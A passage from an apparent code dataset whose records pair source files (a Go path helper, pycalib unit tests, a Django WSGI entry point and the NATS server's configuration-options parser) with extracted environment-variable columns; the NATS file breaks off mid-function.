home, err := os.UserHomeDir()
if err != nil {
return "", err
}
path = filepath.Join(
home, strings.TrimPrefix(path, homePrefix))
}
if c.Paths.Root == "" {
return path, nil
}
if strings.HasPrefix(path, "$EVM_ROOT") {
path = filepath.Join(c.Paths.Root, path[9:])
} else if !filepath.IsAbs(path) {
path = filepath.Join(c.Paths.Root, path)
}
return path, nil
}
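// Illustrative behavior of normalizePath (paths here are hypothetical): in user
// mode with Root "/home/u/.evm", "$EVM_ROOT/shims" becomes "/home/u/.evm/shims",
// "~/tools" becomes "/home/u/tools", and a bare relative path like "cache" is
// joined onto Root as "/home/u/.evm/cache".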
|
[
"\"EVM_MODE\"",
"\"EVM_ROOT\"",
"\"EVM_VERSION\""
] |
[] |
[
"EVM_ROOT",
"EVM_MODE",
"EVM_VERSION"
] |
[]
|
["EVM_ROOT", "EVM_MODE", "EVM_VERSION"]
|
go
| 3 | 0 | |
pycalib/tests/models/test_init.py
|
import unittest
import numpy as np
from sklearn.linear_model import LogisticRegression
from sklearn.datasets import make_blobs
from pycalib.models import (IsotonicCalibration, LogisticCalibration,
BinningCalibration, SigmoidCalibration,
CalibratedModel)
from numpy.testing import assert_array_equal
class TestIsotonicCalibration(unittest.TestCase):
def test_fit_predict(self):
S = np.array([[0.1, 0.9], [0.6, 0.4]])
Y = np.array([1, 0])
cal = IsotonicCalibration()
cal.fit(S, Y)
pred = cal.predict(S)
assert_array_equal(Y, pred)
class TestLogisticCalibration(unittest.TestCase):
def test_fit_predict(self):
S = np.array([[0.1, 0.9], [0.6, 0.4]])
Y = np.array([1, 0])
cal = LogisticCalibration()
cal.fit(S, Y)
pred = cal.predict(S)
assert_array_equal(Y, pred)
class TestBinningCalibration(unittest.TestCase):
def test_fit_predict(self):
S = np.array([[0.1, 0.9], [0.6, 0.4]])
Y = np.array([1, 0])
cal = BinningCalibration()
cal.fit(S, Y)
pred = cal.predict(S)
assert_array_equal(Y, pred)
class TestSigmoidCalibration(unittest.TestCase):
def test_fit_predict(self):
S = np.array([[0.1, 0.9], [0.6, 0.4]])
Y = np.array([1, 0])
cal = SigmoidCalibration()
cal.fit(S, Y)
pred = cal.predict(S)
assert_array_equal(Y, pred)
class TestCalibratedModel(unittest.TestCase):
def test_fit_predict(self):
X, Y = make_blobs(n_samples=10000, centers=5, n_features=2,
random_state=42)
Y = (Y > 2).astype(int)
cal = CalibratedModel(LogisticRegression(), IsotonicCalibration())
cal.fit(X, Y)
pred = cal.predict(X)
self.assertGreater(np.mean(Y == pred), 0.7)
def main():
unittest.main()
if __name__ == '__main__':
main()
|
[] |
[] |
[] |
[]
|
[]
|
python
| null | null | null |
soil/wsgi.py
|
"""
WSGI config for soil project.
It exposes the WSGI callable as a module-level variable named ``application``.
For more information on this file, see
https://docs.djangoproject.com/en/3.2/howto/deployment/wsgi/
"""
import os
from django.core.wsgi import get_wsgi_application
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'soil.settings')
application = get_wsgi_application()
|
[] |
[] |
[] |
[]
|
[]
|
python
| 0 | 0 | |
server/opts.go
|
// Copyright 2012-2020 The NATS Authors
// Licensed under the Apache License, Version 2.0 (the "License");
// you may not use this file except in compliance with the License.
// You may obtain a copy of the License at
//
// http://www.apache.org/licenses/LICENSE-2.0
//
// Unless required by applicable law or agreed to in writing, software
// distributed under the License is distributed on an "AS IS" BASIS,
// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
// See the License for the specific language governing permissions and
// limitations under the License.
package server
import (
"context"
"crypto/tls"
"crypto/x509"
"errors"
"flag"
"fmt"
"io/ioutil"
"net"
"net/url"
"os"
"path"
"path/filepath"
"regexp"
"runtime"
"strconv"
"strings"
"sync/atomic"
"time"
"github.com/nats-io/jwt/v2"
"github.com/nats-io/nkeys"
"github.com/nats-io/nats-server/v2/conf"
)
var allowUnknownTopLevelField = int32(0)
// NoErrOnUnknownFields can be used to change the behavior of the processing
// of a configuration file. By default, an error is reported if unknown
// fields are found. If `noError` is set to true, no error will be reported
// if top-level unknown fields are found.
func NoErrOnUnknownFields(noError bool) {
var val int32
if noError {
val = int32(1)
}
atomic.StoreInt32(&allowUnknownTopLevelField, val)
}
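// Illustrative usage sketch (call site assumed): callers that want to tolerate
// unknown top-level fields can flip the flag before parsing, e.g.
// NoErrOnUnknownFields(true)
// opts, err := ProcessConfigFile("nats-server.conf")
// Unknown fields nested inside known blocks are still reported as errors.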
// ClusterOpts are options for clusters.
// NOTE: This structure is no longer used for monitoring endpoints
// and json tags are deprecated and may be removed in the future.
type ClusterOpts struct {
Name string `json:"-"`
Host string `json:"addr,omitempty"`
Port int `json:"cluster_port,omitempty"`
Username string `json:"-"`
Password string `json:"-"`
AuthTimeout float64 `json:"auth_timeout,omitempty"`
Permissions *RoutePermissions `json:"-"`
TLSTimeout float64 `json:"-"`
TLSConfig *tls.Config `json:"-"`
TLSMap bool `json:"-"`
TLSCheckKnownURLs bool `json:"-"`
ListenStr string `json:"-"`
Advertise string `json:"-"`
NoAdvertise bool `json:"-"`
ConnectRetries int `json:"-"`
// Not exported (used in tests)
resolver netResolver
}
// GatewayOpts are options for gateways.
// NOTE: This structure is no longer used for monitoring endpoints
// and json tags are deprecated and may be removed in the future.
type GatewayOpts struct {
Name string `json:"name"`
Host string `json:"addr,omitempty"`
Port int `json:"port,omitempty"`
Username string `json:"-"`
Password string `json:"-"`
AuthTimeout float64 `json:"auth_timeout,omitempty"`
TLSConfig *tls.Config `json:"-"`
TLSTimeout float64 `json:"tls_timeout,omitempty"`
TLSMap bool `json:"-"`
TLSCheckKnownURLs bool `json:"-"`
Advertise string `json:"advertise,omitempty"`
ConnectRetries int `json:"connect_retries,omitempty"`
Gateways []*RemoteGatewayOpts `json:"gateways,omitempty"`
RejectUnknown bool `json:"reject_unknown,omitempty"` // config got renamed to reject_unknown_cluster
// Not exported, for tests.
resolver netResolver
sendQSubsBufSize int
}
// RemoteGatewayOpts are options for connecting to a remote gateway
// NOTE: This structure is no longer used for monitoring endpoints
// and json tags are deprecated and may be removed in the future.
type RemoteGatewayOpts struct {
Name string `json:"name"`
TLSConfig *tls.Config `json:"-"`
TLSTimeout float64 `json:"tls_timeout,omitempty"`
URLs []*url.URL `json:"urls,omitempty"`
}
// LeafNodeOpts are options for a given server to accept leaf node connections and/or connect to a remote cluster.
type LeafNodeOpts struct {
Host string `json:"addr,omitempty"`
Port int `json:"port,omitempty"`
Username string `json:"-"`
Password string `json:"-"`
Account string `json:"-"`
Users []*User `json:"-"`
AuthTimeout float64 `json:"auth_timeout,omitempty"`
TLSConfig *tls.Config `json:"-"`
TLSTimeout float64 `json:"tls_timeout,omitempty"`
TLSMap bool `json:"-"`
Advertise string `json:"-"`
NoAdvertise bool `json:"-"`
ReconnectInterval time.Duration `json:"-"`
// For solicited connections to other clusters/superclusters.
Remotes []*RemoteLeafOpts `json:"remotes,omitempty"`
// Not exported, for tests.
resolver netResolver
dialTimeout time.Duration
connDelay time.Duration
}
// RemoteLeafOpts are options for connecting to a remote server as a leaf node.
type RemoteLeafOpts struct {
LocalAccount string `json:"local_account,omitempty"`
URLs []*url.URL `json:"urls,omitempty"`
Credentials string `json:"-"`
TLS bool `json:"-"`
TLSConfig *tls.Config `json:"-"`
TLSTimeout float64 `json:"tls_timeout,omitempty"`
Hub bool `json:"hub,omitempty"`
DenyImports []string `json:"-"`
DenyExports []string `json:"-"`
}
// Options block for nats-server.
// NOTE: This structure is no longer used for monitoring endpoints
// and json tags are deprecated and may be removed in the future.
type Options struct {
ConfigFile string `json:"-"`
ServerName string `json:"server_name"`
Host string `json:"addr"`
Port int `json:"port"`
ClientAdvertise string `json:"-"`
Trace bool `json:"-"`
Debug bool `json:"-"`
TraceVerbose bool `json:"-"`
NoLog bool `json:"-"`
NoSigs bool `json:"-"`
NoSublistCache bool `json:"-"`
NoHeaderSupport bool `json:"-"`
DisableShortFirstPing bool `json:"-"`
Logtime bool `json:"-"`
MaxConn int `json:"max_connections"`
MaxSubs int `json:"max_subscriptions,omitempty"`
Nkeys []*NkeyUser `json:"-"`
Users []*User `json:"-"`
Accounts []*Account `json:"-"`
NoAuthUser string `json:"-"`
SystemAccount string `json:"-"`
NoSystemAccount bool `json:"-"`
AllowNewAccounts bool `json:"-"`
Username string `json:"-"`
Password string `json:"-"`
Authorization string `json:"-"`
PingInterval time.Duration `json:"ping_interval"`
MaxPingsOut int `json:"ping_max"`
HTTPHost string `json:"http_host"`
HTTPPort int `json:"http_port"`
HTTPBasePath string `json:"http_base_path"`
HTTPSPort int `json:"https_port"`
AuthTimeout float64 `json:"auth_timeout"`
MaxControlLine int32 `json:"max_control_line"`
MaxPayload int32 `json:"max_payload"`
MaxPending int64 `json:"max_pending"`
Cluster ClusterOpts `json:"cluster,omitempty"`
Gateway GatewayOpts `json:"gateway,omitempty"`
LeafNode LeafNodeOpts `json:"leaf,omitempty"`
JetStream bool `json:"jetstream"`
JetStreamMaxMemory int64 `json:"-"`
JetStreamMaxStore int64 `json:"-"`
StoreDir string `json:"-"`
Websocket WebsocketOpts `json:"-"`
MQTT MQTTOpts `json:"-"`
ProfPort int `json:"-"`
PidFile string `json:"-"`
PortsFileDir string `json:"-"`
LogFile string `json:"-"`
LogSizeLimit int64 `json:"-"`
Syslog bool `json:"-"`
RemoteSyslog string `json:"-"`
Routes []*url.URL `json:"-"`
RoutesStr string `json:"-"`
TLSTimeout float64 `json:"tls_timeout"`
TLS bool `json:"-"`
TLSVerify bool `json:"-"`
TLSMap bool `json:"-"`
TLSCert string `json:"-"`
TLSKey string `json:"-"`
TLSCaCert string `json:"-"`
TLSConfig *tls.Config `json:"-"`
AllowNonTLS bool `json:"-"`
WriteDeadline time.Duration `json:"-"`
MaxClosedClients int `json:"-"`
LameDuckDuration time.Duration `json:"-"`
LameDuckGracePeriod time.Duration `json:"-"`
// MaxTracedMsgLen is the maximum printable length for traced messages.
MaxTracedMsgLen int `json:"-"`
// Operating a trusted NATS server
TrustedKeys []string `json:"-"`
TrustedOperators []*jwt.OperatorClaims `json:"-"`
AccountResolver AccountResolver `json:"-"`
AccountResolverTLSConfig *tls.Config `json:"-"`
resolverPreloads map[string]string
CustomClientAuthentication Authentication `json:"-"`
CustomRouterAuthentication Authentication `json:"-"`
// CheckConfig enables a configuration file syntax check: the server validates the file and exits.
CheckConfig bool `json:"-"`
// ConnectErrorReports specifies the number of failed attempts
// at which point server should report the failure of an initial
// connection to a route, gateway or leaf node.
// See DEFAULT_CONNECT_ERROR_REPORTS for default value.
ConnectErrorReports int
// ReconnectErrorReports is similar to ConnectErrorReports except
// that this applies to reconnect events.
ReconnectErrorReports int
// private fields, used to know if bool options are explicitly
// defined in config and/or command line params.
inConfig map[string]bool
inCmdLine map[string]bool
// private fields, used for testing
gatewaysSolicitDelay time.Duration
routeProto int
}
// WebsocketOpts are options for websocket
type WebsocketOpts struct {
// The server will accept websocket client connections on this hostname/IP.
Host string
// The server will accept websocket client connections on this port.
Port int
// The host:port to advertise to websocket clients in the cluster.
Advertise string
// If no user name is provided when a client connects, the server will default
// to the matching user from the global list of users in `Options.Users`.
NoAuthUser string
// Name of the cookie, which if present in WebSocket upgrade headers,
// will be treated as JWT during CONNECT phase as long as
// "jwt" specified in the CONNECT options is missing or empty.
JWTCookie string
// Authentication section. If anything is configured in this section,
// it will override the authorization configuration of regular clients.
Username string
Password string
Token string
// Timeout for the authentication process.
AuthTimeout float64
// By default the server will enforce the use of TLS. If no TLS configuration
// is provided, you need to explicitly set NoTLS to true to allow the server
// to start without TLS configuration. Note that if a TLS configuration is
// present, this boolean is ignored and the server will run the Websocket
// server with that TLS configuration.
// Running without TLS is less secure since Websocket clients that use bearer
// tokens will send them in clear. So this should not be used in production.
NoTLS bool
// TLS configuration is required.
TLSConfig *tls.Config
// If true, map certificate values for authentication purposes.
TLSMap bool
// If true, the Origin header must match the request's host.
SameOrigin bool
// Only origins in this list will be accepted. If empty and
// SameOrigin is false, any origin is accepted.
AllowedOrigins []string
// If set to true, the server will negotiate with clients
// if compression can be used. If this is false, no compression
// will be used (both in server and clients) since it has to
// be negotiated between both endpoints
Compression bool
// Total time allowed for the server to read the client request
// and write the response back to the client. This include the
// time needed for the TLS Handshake.
HandshakeTimeout time.Duration
}
// MQTTOpts are options for MQTT
type MQTTOpts struct {
// The server will accept MQTT client connections on this hostname/IP.
Host string
// The server will accept MQTT client connections on this port.
Port int
// If no user name is provided when a client connects, the server will default
// to the matching user from the global list of users in `Options.Users`.
NoAuthUser string
// Authentication section. If anything is configured in this section,
// it will override the authorization configuration of regular clients.
Username string
Password string
Token string
// Timeout for the authentication process.
AuthTimeout float64
// TLS configuration is required.
TLSConfig *tls.Config
// If true, map certificate values for authentication purposes.
TLSMap bool
// Timeout for the TLS handshake
TLSTimeout float64
// AckWait is the amount of time after which a QoS 1 message sent to
// a client is redelivered as a DUPLICATE if the server has not
// received the PUBACK on the original Packet Identifier.
// The value has to be positive.
// Zero will cause the server to use the default value (1 hour).
// Note that changes to this option are applied only to new MQTT subscriptions.
AckWait time.Duration
// MaxAckPending is the amount of QoS 1 messages the server can send to
// a session without receiving any PUBACK for those messages.
// The valid range is [0..65535].
// Zero will cause the server to use the default value (1024).
// Note that changes to this option are applied only to new MQTT sessions.
MaxAckPending uint16
}
type netResolver interface {
LookupHost(ctx context.Context, host string) ([]string, error)
}
// Clone performs a deep copy of the Options struct, returning a new clone
// with all values copied.
func (o *Options) Clone() *Options {
if o == nil {
return nil
}
clone := &Options{}
*clone = *o
if o.Users != nil {
clone.Users = make([]*User, len(o.Users))
for i, user := range o.Users {
clone.Users[i] = user.clone()
}
}
if o.Nkeys != nil {
clone.Nkeys = make([]*NkeyUser, len(o.Nkeys))
for i, nkey := range o.Nkeys {
clone.Nkeys[i] = nkey.clone()
}
}
if o.Routes != nil {
clone.Routes = deepCopyURLs(o.Routes)
}
if o.TLSConfig != nil {
clone.TLSConfig = o.TLSConfig.Clone()
}
if o.Cluster.TLSConfig != nil {
clone.Cluster.TLSConfig = o.Cluster.TLSConfig.Clone()
}
if o.Gateway.TLSConfig != nil {
clone.Gateway.TLSConfig = o.Gateway.TLSConfig.Clone()
}
if len(o.Gateway.Gateways) > 0 {
clone.Gateway.Gateways = make([]*RemoteGatewayOpts, len(o.Gateway.Gateways))
for i, g := range o.Gateway.Gateways {
clone.Gateway.Gateways[i] = g.clone()
}
}
// FIXME(dlc) - clone leaf node stuff.
return clone
}
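// Illustrative usage sketch (scenario assumed): derive an independent copy of
// parsed options that can be mutated without affecting the original, e.g.
// base, _ := ProcessConfigFile("base.conf")
// alt := base.Clone()
// alt.Port = 5222 // leaves base.Port untouched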
func deepCopyURLs(urls []*url.URL) []*url.URL {
if urls == nil {
return nil
}
curls := make([]*url.URL, len(urls))
for i, u := range urls {
cu := &url.URL{}
*cu = *u
curls[i] = cu
}
return curls
}
// Configuration file authorization section.
type authorization struct {
// Singles
user string
pass string
token string
acc string
// Multiple Nkeys/Users
nkeys []*NkeyUser
users []*User
timeout float64
defaultPermissions *Permissions
}
// TLSConfigOpts holds the parsed tls config information,
// used with flag parsing
type TLSConfigOpts struct {
CertFile string
KeyFile string
CaFile string
Verify bool
Insecure bool
Map bool
TLSCheckKnownURLs bool
Timeout float64
Ciphers []uint16
CurvePreferences []tls.CurveID
}
var tlsUsage = `
TLS configuration is specified in the tls section of a configuration file:
e.g.
tls {
cert_file: "./certs/server-cert.pem"
key_file: "./certs/server-key.pem"
ca_file: "./certs/ca.pem"
verify: true
verify_and_map: true
cipher_suites: [
"TLS_ECDHE_ECDSA_WITH_AES_128_GCM_SHA256",
"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256"
]
curve_preferences: [
"CurveP256",
"CurveP384",
"CurveP521"
]
}
Available cipher suites include:
`
// ProcessConfigFile processes a configuration file.
// FIXME(dlc): A bit hacky
func ProcessConfigFile(configFile string) (*Options, error) {
opts := &Options{}
if err := opts.ProcessConfigFile(configFile); err != nil {
// If only warnings then continue and return the options.
if cerr, ok := err.(*processConfigErr); ok && len(cerr.Errors()) == 0 {
return opts, nil
}
return nil, err
}
return opts, nil
}
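// Illustrative usage sketch (file name assumed): because warning-only results
// are swallowed above, callers of this helper typically just check err, e.g.
// opts, err := ProcessConfigFile("server.conf")
// if err != nil { /* real configuration errors, not mere warnings */ }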
// token is an item parsed from the configuration.
type token interface {
Value() interface{}
Line() int
IsUsedVariable() bool
SourceFile() string
Position() int
}
// unwrapValue can be used to get the token and value from an item
// to be able to report the line number in case of an incorrect
// configuration.
// also stores the token in lastToken for use in convertPanicToError
func unwrapValue(v interface{}, lastToken *token) (token, interface{}) {
switch tk := v.(type) {
case token:
if lastToken != nil {
*lastToken = tk
}
return tk, tk.Value()
default:
return nil, v
}
}
// use in defer to recover from panic and turn it into an error associated with last token
func convertPanicToErrorList(lastToken *token, errors *[]error) {
// only recover if an error can be stored
if errors == nil {
return
} else if err := recover(); err == nil {
return
} else if lastToken != nil && *lastToken != nil {
*errors = append(*errors, &configErr{*lastToken, fmt.Sprint(err)})
} else {
*errors = append(*errors, fmt.Errorf("encountered panic without a token %v", err))
}
}
// use in defer to recover from panic and turn it into an error associated with last token
func convertPanicToError(lastToken *token, e *error) {
// only recover if an error can be stored
if e == nil || *e != nil {
return
} else if err := recover(); err == nil {
return
} else if lastToken != nil && *lastToken != nil {
*e = &configErr{*lastToken, fmt.Sprint(err)}
} else {
*e = fmt.Errorf("%v", err)
}
}
// configureSystemAccount configures a system account
// if present in the configuration.
func configureSystemAccount(o *Options, m map[string]interface{}) (retErr error) {
var lt token
defer convertPanicToError(&lt, &retErr)
configure := func(v interface{}) error {
tk, v := unwrapValue(v, &lt)
sa, ok := v.(string)
if !ok {
return &configErr{tk, "system account name must be a string"}
}
o.SystemAccount = sa
return nil
}
if v, ok := m["system_account"]; ok {
return configure(v)
} else if v, ok := m["system"]; ok {
return configure(v)
}
return nil
}
// ProcessConfigFile updates the Options structure with options
// present in the given configuration file.
// This version is convenient if one wants to set some default
// options and then override them with what is in the config file.
// For instance, this version allows you to do something such as:
//
// opts := &Options{Debug: true}
// opts.ProcessConfigFile(myConfigFile)
//
// If the config file contains "debug: false", after this call,
// opts.Debug would really be false. It would be impossible to
// achieve that with the non receiver ProcessConfigFile() version,
// since one would not know after the call if "debug" was not present
// or was present but set to false.
func (o *Options) ProcessConfigFile(configFile string) error {
o.ConfigFile = configFile
if configFile == "" {
return nil
}
m, err := conf.ParseFileWithChecks(configFile)
if err != nil {
return err
}
// Collect all errors and warnings and report them all together.
errors := make([]error, 0)
warnings := make([]error, 0)
// First check whether a system account has been defined,
// as that is a condition for other features to be enabled.
if err := configureSystemAccount(o, m); err != nil {
errors = append(errors, err)
}
for k, v := range m {
o.processConfigFileLine(k, v, &errors, &warnings)
}
if len(errors) > 0 || len(warnings) > 0 {
return &processConfigErr{
errors: errors,
warnings: warnings,
}
}
return nil
}
func (o *Options) processConfigFileLine(k string, v interface{}, errors *[]error, warnings *[]error) {
var lt token
defer convertPanicToErrorList(&lt, errors)
tk, v := unwrapValue(v, &lt)
switch strings.ToLower(k) {
case "listen":
hp, err := parseListen(v)
if err != nil {
*errors = append(*errors, &configErr{tk, err.Error()})
return
}
o.Host = hp.host
o.Port = hp.port
case "client_advertise":
o.ClientAdvertise = v.(string)
case "port":
o.Port = int(v.(int64))
case "server_name":
o.ServerName = v.(string)
case "host", "net":
o.Host = v.(string)
case "debug":
o.Debug = v.(bool)
trackExplicitVal(o, &o.inConfig, "Debug", o.Debug)
case "trace":
o.Trace = v.(bool)
trackExplicitVal(o, &o.inConfig, "Trace", o.Trace)
case "trace_verbose":
o.TraceVerbose = v.(bool)
o.Trace = v.(bool)
trackExplicitVal(o, &o.inConfig, "TraceVerbose", o.TraceVerbose)
trackExplicitVal(o, &o.inConfig, "Trace", o.Trace)
case "logtime":
o.Logtime = v.(bool)
trackExplicitVal(o, &o.inConfig, "Logtime", o.Logtime)
case "mappings", "maps":
gacc := NewAccount(globalAccountName)
o.Accounts = append(o.Accounts, gacc)
err := parseAccountMappings(tk, gacc, errors, warnings)
if err != nil {
*errors = append(*errors, err)
return
}
case "disable_sublist_cache", "no_sublist_cache":
o.NoSublistCache = v.(bool)
case "accounts":
err := parseAccounts(tk, o, errors, warnings)
if err != nil {
*errors = append(*errors, err)
return
}
case "authorization":
auth, err := parseAuthorization(tk, o, errors, warnings)
if err != nil {
*errors = append(*errors, err)
return
}
o.Username = auth.user
o.Password = auth.pass
o.Authorization = auth.token
if (auth.user != "" || auth.pass != "") && auth.token != "" {
err := &configErr{tk, "Cannot have a user/pass and token"}
*errors = append(*errors, err)
return
}
o.AuthTimeout = auth.timeout
// Check for multiple users defined
if auth.users != nil {
if auth.user != "" {
err := &configErr{tk, "Can not have a single user/pass and a users array"}
*errors = append(*errors, err)
return
}
if auth.token != "" {
err := &configErr{tk, "Can not have a token and a users array"}
*errors = append(*errors, err)
return
}
// Users may have been added from Accounts parsing, so do an append here
o.Users = append(o.Users, auth.users...)
}
// Check for nkeys
if auth.nkeys != nil {
// NKeys may have been added from Accounts parsing, so do an append here
o.Nkeys = append(o.Nkeys, auth.nkeys...)
}
case "http":
hp, err := parseListen(v)
if err != nil {
err := &configErr{tk, err.Error()}
*errors = append(*errors, err)
return
}
o.HTTPHost = hp.host
o.HTTPPort = hp.port
case "https":
hp, err := parseListen(v)
if err != nil {
err := &configErr{tk, err.Error()}
*errors = append(*errors, err)
return
}
o.HTTPHost = hp.host
o.HTTPSPort = hp.port
case "http_port", "monitor_port":
o.HTTPPort = int(v.(int64))
case "https_port":
o.HTTPSPort = int(v.(int64))
case "http_base_path":
o.HTTPBasePath = v.(string)
case "cluster":
err := parseCluster(tk, o, errors, warnings)
if err != nil {
*errors = append(*errors, err)
return
}
case "gateway":
if err := parseGateway(tk, o, errors, warnings); err != nil {
*errors = append(*errors, err)
return
}
case "leaf", "leafnodes":
err := parseLeafNodes(tk, o, errors, warnings)
if err != nil {
*errors = append(*errors, err)
return
}
case "jetstream":
err := parseJetStream(tk, o, errors, warnings)
if err != nil {
*errors = append(*errors, err)
return
}
case "logfile", "log_file":
o.LogFile = v.(string)
case "logfile_size_limit", "log_size_limit":
o.LogSizeLimit = v.(int64)
case "syslog":
o.Syslog = v.(bool)
trackExplicitVal(o, &o.inConfig, "Syslog", o.Syslog)
case "remote_syslog":
o.RemoteSyslog = v.(string)
case "pidfile", "pid_file":
o.PidFile = v.(string)
case "ports_file_dir":
o.PortsFileDir = v.(string)
case "prof_port":
o.ProfPort = int(v.(int64))
case "max_control_line":
if v.(int64) > 1<<31-1 {
err := &configErr{tk, fmt.Sprintf("%s value is too big", k)}
*errors = append(*errors, err)
return
}
o.MaxControlLine = int32(v.(int64))
case "max_payload":
if v.(int64) > 1<<31-1 {
err := &configErr{tk, fmt.Sprintf("%s value is too big", k)}
*errors = append(*errors, err)
return
}
o.MaxPayload = int32(v.(int64))
case "max_pending":
o.MaxPending = v.(int64)
case "max_connections", "max_conn":
o.MaxConn = int(v.(int64))
case "max_traced_msg_len":
o.MaxTracedMsgLen = int(v.(int64))
case "max_subscriptions", "max_subs":
o.MaxSubs = int(v.(int64))
case "ping_interval":
o.PingInterval = parseDuration("ping_interval", tk, v, errors, warnings)
case "ping_max":
o.MaxPingsOut = int(v.(int64))
case "tls":
tc, err := parseTLS(tk, true)
if err != nil {
*errors = append(*errors, err)
return
}
if o.TLSConfig, err = GenTLSConfig(tc); err != nil {
err := &configErr{tk, err.Error()}
*errors = append(*errors, err)
return
}
o.TLSTimeout = tc.Timeout
o.TLSMap = tc.Map
case "allow_non_tls":
o.AllowNonTLS = v.(bool)
case "write_deadline":
o.WriteDeadline = parseDuration("write_deadline", tk, v, errors, warnings)
case "lame_duck_duration":
dur, err := time.ParseDuration(v.(string))
if err != nil {
err := &configErr{tk, fmt.Sprintf("error parsing lame_duck_duration: %v", err)}
*errors = append(*errors, err)
return
}
if dur < 30*time.Second {
err := &configErr{tk, fmt.Sprintf("invalid lame_duck_duration of %v, minimum is 30 seconds", dur)}
*errors = append(*errors, err)
return
}
o.LameDuckDuration = dur
case "lame_duck_grace_period":
dur, err := time.ParseDuration(v.(string))
if err != nil {
err := &configErr{tk, fmt.Sprintf("error parsing lame_duck_grace_period: %v", err)}
*errors = append(*errors, err)
return
}
if dur < 0 {
err := &configErr{tk, "invalid lame_duck_grace_period, needs to be positive"}
*errors = append(*errors, err)
return
}
o.LameDuckGracePeriod = dur
case "operator", "operators", "roots", "root", "root_operators", "root_operator":
opFiles := []string{}
switch v := v.(type) {
case string:
opFiles = append(opFiles, v)
case []string:
opFiles = append(opFiles, v...)
default:
err := &configErr{tk, fmt.Sprintf("error parsing operators: unsupported type %T", v)}
*errors = append(*errors, err)
}
// Assume for now these are file names, but they can also be the JWT itself inline.
o.TrustedOperators = make([]*jwt.OperatorClaims, 0, len(opFiles))
for _, fname := range opFiles {
opc, err := ReadOperatorJWT(fname)
if err != nil {
err := &configErr{tk, fmt.Sprintf("error parsing operator JWT: %v", err)}
*errors = append(*errors, err)
continue
}
o.TrustedOperators = append(o.TrustedOperators, opc)
}
if len(o.TrustedOperators) == 1 {
// In case "resolver" is defined as well, it takes precedence
if o.AccountResolver == nil {
if accUrl, err := parseURL(o.TrustedOperators[0].AccountServerURL, "account resolver"); err == nil {
// nsc automatically appends "/accounts" during nsc push
o.AccountResolver, _ = NewURLAccResolver(accUrl.String() + "/accounts")
}
}
// In case "system_account" is defined as well, it takes precedence
if o.SystemAccount == "" {
o.SystemAccount = o.TrustedOperators[0].SystemAccount
}
}
case "resolver", "account_resolver", "accounts_resolver":
switch v := v.(type) {
case string:
// "resolver" takes precedence over value obtained from "operator".
// Clear so that parsing errors are not silently ignored.
o.AccountResolver = nil
memResolverRe := regexp.MustCompile(`(?i)(MEM|MEMORY)\s*`)
resolverRe := regexp.MustCompile(`(?i)(?:URL){1}(?:\({1}\s*"?([^\s"]*)"?\s*\){1})?\s*`)
if memResolverRe.MatchString(v) {
o.AccountResolver = &MemAccResolver{}
} else if items := resolverRe.FindStringSubmatch(v); len(items) == 2 {
url := items[1]
_, err := parseURL(url, "account resolver")
if err != nil {
*errors = append(*errors, &configErr{tk, err.Error()})
return
}
if ur, err := NewURLAccResolver(url); err != nil {
err := &configErr{tk, err.Error()}
*errors = append(*errors, err)
return
} else {
o.AccountResolver = ur
}
}
case map[string]interface{}:
del := false
dir := ""
dirType := ""
limit := int64(0)
ttl := time.Duration(0)
sync := time.Duration(0)
var err error
if v, ok := v["dir"]; ok {
_, v := unwrapValue(v, &lt)
dir = v.(string)
}
if v, ok := v["type"]; ok {
_, v := unwrapValue(v, &lt)
dirType = v.(string)
}
if v, ok := v["allow_delete"]; ok {
_, v := unwrapValue(v, &lt)
del = v.(bool)
}
if v, ok := v["limit"]; ok {
_, v := unwrapValue(v, &lt)
limit = v.(int64)
}
if v, ok := v["ttl"]; ok {
_, v := unwrapValue(v, &lt)
ttl, err = time.ParseDuration(v.(string))
}
if v, ok := v["interval"]; err == nil && ok {
_, v := unwrapValue(v, &lt)
sync, err = time.ParseDuration(v.(string))
}
if err != nil {
*errors = append(*errors, &configErr{tk, err.Error()})
return
}
if dir == "" {
*errors = append(*errors, &configErr{tk, "dir has no value and needs to point to a directory"})
return
}
if info, _ := os.Stat(dir); info != nil && (!info.IsDir() || info.Mode().Perm()&(1<<(uint(7))) == 0) {
*errors = append(*errors, &configErr{tk, "dir needs to point to an accessible directory"})
return
}
var res AccountResolver
switch strings.ToUpper(dirType) {
case "CACHE":
if sync != 0 {
*errors = append(*errors, &configErr{tk, "CACHE does not accept sync"})
}
if del {
*errors = append(*errors, &configErr{tk, "CACHE does not accept allow_delete"})
}
res, err = NewCacheDirAccResolver(dir, limit, ttl)
case "FULL":
if ttl != 0 {
*errors = append(*errors, &configErr{tk, "FULL does not accept ttl"})
}
res, err = NewDirAccResolver(dir, limit, sync, del)
}
if err != nil {
*errors = append(*errors, &configErr{tk, err.Error()})
return
}
o.AccountResolver = res
default:
err := &configErr{tk, fmt.Sprintf("error parsing operator resolver, wrong type %T", v)}
*errors = append(*errors, err)
return
}
if o.AccountResolver == nil {
err := &configErr{tk, "error parsing account resolver, should be MEM or " +
" URL(\"url\") or a map containing dir and type state=[FULL|CACHE])"}
*errors = append(*errors, err)
}
case "resolver_tls":
tc, err := parseTLS(tk, true)
if err != nil {
*errors = append(*errors, err)
return
}
if o.AccountResolverTLSConfig, err = GenTLSConfig(tc); err != nil {
err := &configErr{tk, err.Error()}
*errors = append(*errors, err)
return
}
case "resolver_preload":
mp, ok := v.(map[string]interface{})
if !ok {
err := &configErr{tk, "preload should be a map of account_public_key:account_jwt"}
*errors = append(*errors, err)
return
}
o.resolverPreloads = make(map[string]string)
for key, val := range mp {
tk, val = unwrapValue(val, &lt)
if jwtstr, ok := val.(string); !ok {
err := &configErr{tk, "preload map value should be a string JWT"}
*errors = append(*errors, err)
continue
} else {
// Make sure this is a valid account JWT, that is a config error.
// We will warn of expirations, etc later.
if _, err := jwt.DecodeAccountClaims(jwtstr); err != nil {
err := &configErr{tk, "invalid account JWT"}
*errors = append(*errors, err)
continue
}
o.resolverPreloads[key] = jwtstr
}
}
case "no_auth_user":
o.NoAuthUser = v.(string)
case "system_account", "system":
// Already processed at the beginning so we just skip them
// to not treat them as unknown values.
return
case "no_system_account", "no_system", "no_sys_acc":
o.NoSystemAccount = v.(bool)
case "no_header_support":
o.NoHeaderSupport = v.(bool)
case "trusted", "trusted_keys":
switch v := v.(type) {
case string:
o.TrustedKeys = []string{v}
case []string:
o.TrustedKeys = v
case []interface{}:
keys := make([]string, 0, len(v))
for _, mv := range v {
tk, mv = unwrapValue(mv, &lt)
